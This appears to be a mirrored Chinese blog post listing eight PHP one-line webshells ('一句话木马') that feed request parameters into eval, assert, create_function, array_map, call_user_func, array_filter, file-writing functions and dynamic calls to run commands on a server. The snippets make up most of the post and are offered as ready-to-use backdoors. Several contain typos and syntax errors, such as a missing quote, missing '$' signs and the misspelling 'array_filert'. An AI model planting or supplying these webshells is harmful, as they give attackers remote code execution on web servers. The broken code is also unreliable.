zoukankan      html  css  js  c++  java
  • PHP 8种一句话木马

    一句话木马书写:为什么是一句话木马,因为他可以通过函数接收指定的参数来让我们的操作系统执行指定的命令

      1.eval函数

    <?php eval($_REQUEST['a]);?>

      

      2.assert函数(php官方在php7中更改了assert函数。在php7.0.29之后的版本不支持动态调用。也就是7.0.29之后无法执行命令)

    <?php assert($_REQUEST["a"]); ?>

      

      3.匿名方法构造

    <?php func=create_function('',$_POST['a']); func();?>

      

      4.array_map的书写方式:  

    <?php
        $func = $_POST['a'];
        $arr = array($_POST['b']);
        news = array_map($func, $arr);
    ?>
    

      

      5.call_user_func(方法名,参数)  把接受的第一个值当作回调函数调用,其余参数作为回调函数的参数

    <?php
    $a = $_GET['a'];
    call_user_func(assert,$a);
    
    //书写为一句
    //call_user_func(assert,$_GET['a']);
    ?>

      

      6.array_filert(方法名,数组)

    <?php
    //函数过滤器,学过python的小伙伴一定看的懂,就是将数组中的每个值放到指定的函数中,返回一个只含有true的结果,上方的array_map也和python的map函数基本相像
    $arr = array_filert($_GET['func'],array($_GET['a']));
    ?>

      

      7.文件操作函数:生成一个之前的一句话木马,

    <?php 
    $test='<?php eval($_POST['a']);?>';
    file_put_contents('test1.php',$test);
    //一句话的书写方式
    fputs(fopen('a.php','w'),'<?php assert($_POST["a"]?>');
    ?>

      

      8.动态函数调用:接收一个函数作为函数名,一个函数作为参数进行动态调用

    <?
        $_GET['func']($_GET['a']);
    ?>

     

  • 相关阅读:
    PgSql备份pg_dump与还原手记pg_restore(转)
    精通 JS正则表达式(转)
    88个常用英语词语搭配
    C3P0 代码分析
    windows 域名+虚拟目录 (php)
    postgresql 查询字段中的某些数据
    Memcached 在windows下的安装 支持 phpwind 后台Memcache 缓存配置
    正则表达式学习笔记
    Word2007快捷键大全
    Windows 版本说明
  • 原文地址:https://www.cnblogs.com/KHZ521/p/12154671.html
Copyright © 2011-2022 走看看